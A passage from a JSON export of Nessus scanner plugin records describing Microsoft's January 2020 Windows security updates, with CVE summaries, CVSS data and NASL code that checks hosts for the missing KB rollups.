hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534310, 4534314])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:24:50", "description": "The remote Windows host is missing security update 4534288 or cumulative update 4534283. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534288: Windows Server 2012 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534283.NASL", "href": "https://www.tenable.com/plugins/nessus/132861", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132861);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534288\");\n script_xref(name:\"MSKB\", value:\"4534283\");\n script_xref(name:\"MSFT\", value:\"MS20-4534288\");\n script_xref(name:\"MSFT\", value:\"MS20-4534283\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4534288: Windows Server 2012 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534288\nor cumulative update 4534283. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\");\n # https://support.microsoft.com/en-us/help/4534288/windows-server-2012-update-kb4534288\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00a24f59\");\n # https://support.microsoft.com/en-us/help/4534283/windows-server-2012-update-kb4534283\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27812eb5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534288 or Cumulative Update KB4534283.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534288', '4534283');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534288, 4534283])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-20T20:45:26", "description": "The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534306: Windows 10 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2021-12-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534306.NASL", "href": "https://www.tenable.com/plugins/nessus/132865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132865);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/13\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n\n script_name(english:\"KB4534306: Windows 10 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534306.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows 